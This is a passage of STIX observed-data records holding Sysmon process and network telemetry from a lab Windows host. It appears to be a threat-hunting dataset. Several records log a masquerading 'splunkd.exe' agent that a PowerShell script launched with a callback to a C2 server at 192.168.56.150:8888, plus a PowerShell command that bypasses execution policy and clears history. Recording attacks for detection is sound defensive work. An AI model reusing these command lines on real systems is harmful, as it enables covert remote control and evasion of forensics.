| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "15", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 50307, | |
| "dst_ref": "6", | |
| "src_port": 50308, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "13": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "14": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "15": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "16": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:SWG30pBXtnbHPozHi2xMFIV9EdQ=", | |
| "direction": "ingress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.788Z", | |
| "last_observed": "2022-07-27T14:26:46.788Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--2410a38a-99cb-4bfd-b82e-d321d9dd38fe", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.776Z", | |
| "modified": "2022-07-28T16:05:45.776Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:57.311347623Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:50.958Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:49.584Z", | |
| "last_observed": "2022-07-27T14:26:49.584Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ac43e5d1-e78c-45bb-bafa-e4ae244b58c9", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.776Z", | |
| "modified": "2022-07-28T16:05:45.776Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "4", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red ", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:17.833563322Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:11.496Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "4", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.091Z", | |
| "last_observed": "2022-07-27T14:27:10.091Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3a0a8a20-d2e4-4a67-a912-572d316ec636", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.776Z", | |
| "modified": "2022-07-28T16:05:45.776Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2c02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "conhost.exe", | |
| "pid": 6044, | |
| "binary_ref": "6", | |
| "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:17.838073335Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:27:11.498Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "conhost.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2c02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.273Z", | |
| "last_observed": "2022-07-27T14:27:10.273Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--66cca090-1354-4e46-a86f-19167e5d9657", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.777Z", | |
| "modified": "2022-07-28T16:05:45.777Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "Clear-History;Clear" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b3f-62e1-2d02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 5728, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C Clear-History;Clear", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:18.862691376Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:12.514Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 5728, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C Clear-History;Clear", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "Clear-History;Clear" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b3f-62e1-2d02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:11.790Z", | |
| "last_observed": "2022-07-27T14:27:11.790Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--9824b764-b4a4-437e-91bf-1225d710ffb1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.777Z", | |
| "modified": "2022-07-28T16:05:45.777Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:27:19.884209290Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:13.557Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 5353, | |
| "dst_ref": "6", | |
| "src_port": 5353, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "udp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "224.0.0.251" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Qe/mTs1/I3vz4xoJeeybzVJcyRA=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.730Z", | |
| "last_observed": "2022-07-27T14:27:10.730Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3060b75d-550d-4d29-82b4-f81f109a14e5", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.777Z", | |
| "modified": "2022-07-28T16:05:45.777Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:19.886094729Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:13.557Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 5353, | |
| "dst_ref": "6", | |
| "src_port": 5353, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "udp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "224.0.0.251" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Qe/mTs1/I3vz4xoJeeybzVJcyRA=", | |
| "direction": "ingress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.731Z", | |
| "last_observed": "2022-07-27T14:27:10.731Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ca22b3fa-f931-443f-a32e-971333f090ca", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.778Z", | |
| "modified": "2022-07-28T16:05:45.778Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:27:19.887239655Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:13.557Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 5353, | |
| "dst_ref": "6", | |
| "src_port": 5353, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "udp", | |
| "ipv6" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv6-addr", | |
| "value": "ff02:0:0:0:0:0:0:fb" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv6-addr", | |
| "value": "fe80:0:0:0:6081:41da:9cd5:7c82" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:jLS/53wpd/sF3k8gpTAHwvpz5Gk=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.731Z", | |
| "last_observed": "2022-07-27T14:27:10.731Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--f1d27fa7-2c6a-45c4-a77d-c0aaee712c3f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.778Z", | |
| "modified": "2022-07-28T16:05:45.778Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:19.888407938Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:13.557Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
